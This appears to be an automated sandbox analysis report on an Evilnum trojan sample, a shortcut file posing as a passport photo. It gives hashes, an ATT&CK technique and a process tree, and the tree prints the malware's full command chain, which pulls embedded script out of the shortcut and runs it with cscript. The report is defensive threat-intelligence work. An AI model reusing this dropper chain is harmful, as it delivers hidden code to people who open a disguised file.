evilnum | bb8b6c6b9b157b093ba5ff60ec5e9e9268b3efa4ebd46a403859a4d65d21cce7

Analysis

Target

bb8b6c6b9b157b093ba5ff60ec5e9e9268b3efa4ebd46a403859a4d65d21cce7.lnk
Size

971KB
MD5

f8b83901acf1e744441b5c2b3d954354
SHA1

fbcb367ec7dd64b253482b4475ccde6ff6b10ab0
SHA256

bb8b6c6b9b157b093ba5ff60ec5e9e9268b3efa4ebd46a403859a4d65d21cce7
SHA512

ad6fdfecfe6904439214fb7d63ed051ab222d8b3fd904c0a9fcb0ee51f3d769d7a4277a7e57052d4976b1a79634fd85d43722fd19bf28226e12d79b286c1111c

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3036 wrote to memory of 4068	3036	cmd.exe	69
PID 3036 wrote to memory of 4068	3036	cmd.exe	69
PID 4068 wrote to memory of 2096	4068	cmd.exe	70
PID 4068 wrote to memory of 2096	4068	cmd.exe	70
PID 4068 wrote to memory of 1864	4068	cmd.exe	71
PID 4068 wrote to memory of 1864	4068	cmd.exe	71
PID 4068 wrote to memory of 8	4068	cmd.exe	72
PID 4068 wrote to memory of 8	4068	cmd.exe	72
PID 4068 wrote to memory of 4028	4068	cmd.exe	73
PID 4068 wrote to memory of 4028	4068	cmd.exe	73
PID 4068 wrote to memory of 4284	4068	cmd.exe	74
PID 4068 wrote to memory of 4284	4068	cmd.exe	74

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bb8b6c6b9b157b093ba5ff60ec5e9e9268b3efa4ebd46a403859a4d65d21cce7.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:3036
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "passport front.jpg.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "pass*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4068
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "pass*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1864
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:4028
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:4284

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact